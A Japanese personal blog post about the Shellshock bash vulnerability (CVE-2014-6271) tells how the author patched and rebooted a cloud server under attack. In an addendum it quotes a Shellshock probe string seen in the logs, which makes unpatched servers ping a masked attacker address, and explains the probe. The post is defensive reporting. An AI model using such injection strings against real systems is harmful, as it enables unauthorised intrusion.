bashの脆弱性(CVE-2014-6271)で大騒ぎ中
関連記事
- 【#AMD】Ryzen CPUなうちのマザボのBIOSをアップデートしたげな【CVE-2023-31315】 【2024年10月13日(日)】
- 【#AMD】Ryzen CPUにBIOSへ不正アプリをインストールできる脆弱性【CVE-2023-31315】 【2024年08月10日(土)】
- #OpenSSH の脆弱性 CVE-2024-6387,らしい...ドロドロドロ 【2024年07月02日(火)】
- 【#Windows】Wi-Fiに関する脆弱性発覚。全Windowsユーザーは今すぐアップデートを 【2024年06月26日(水)】
- IntelのCPUに新たな脆弱性、Downfall。第6世代Skylakeから第11世代Rocket Lakeまで影響。情報漏えいの恐れ 【2023年08月09日(水)】
うへっ!OpenSSLに続いてまたかいな
って,すでにうちのクラウドサーバーにも攻撃が始まっておった(汗
とりあえず,第一防壁で全て跳ね返しておるが
CVE-2014-6271なパッチは,昨日確認したら,当たってた
んが,CVE-2014-7169がまだ当たっていない(滝汗
いや,再起動すれば,パッチは当たるんじゃが
現場が今使ってやがる
緊急リブートしたいぞぉ~~
稼働ログとにらめっこして,リブートタイミングを図っているぞい
っちゅうか,今回のセキュリティバグも,かなりお粗末すぎるぞい
これ,民生ルーターとか大丈夫じゃろか?Linuxで動いているブツ,けっこうあるがのぉ
【追記】
こんな物騒なコマンド,投げつけてきてまする
“() { :; }; /bin/ping -c 1 ***.***.***.***”
パッチが当たってないと,このpingが「サーバー内」で起動かかって,サーバーから目的のアドレスにpingを飛ばすってやつですな
んで,「穴が空いてるじぃ~」をハッカーさんへ御連絡
んで,本攻撃が始まると((((;゚Д゚))))ガクガクブルブル
ってことで,サーバーを緊急リブートして,全てのパッチを当てましたっす(;´Д`)ハァハァ
UNIX系のソフト「bash」に重大バグ、システム乗っ取りも
[ボストン 24日 ロイター] – 基本ソフト(OS)Linux(リナックス)上で広く使われているソフトウエア「bash」に、新しくセキュリティー上のバグがあることが分かった。専門家らが24日警告した。4月に発覚したオンラインのデータ暗号化ソフトのバグ「ハートブリード」より大きな被害を引き起こす危険性があるという。 (以下略) |
ロイター |
コメント
ご近所にココイチが出来る,らしい
【梅雨】朝から大雨ぇ~ さすが梅雨じゃ(25/5/17)
今日は城主生誕記念日で日本国は祝日,らしい...
兵庫 城崎温泉 旅館で火事 ほぼ消し止められる
東海道新幹線 停電のため運転見合わせ 区間が拡大 原因調査中
【霧島山】新燃岳:活発化してた火山性地震,ピタッと止まった(25/4/26)
今日は落雷,ひょうに厳重警戒じゃげな(25/4/14)
中日本高速道路 ETCシステム障害 7都県 一部の専用レーン閉鎖(25/4/6)
iPhone米価格は相互関税で30─40%上昇か、上位機種は2300ドルも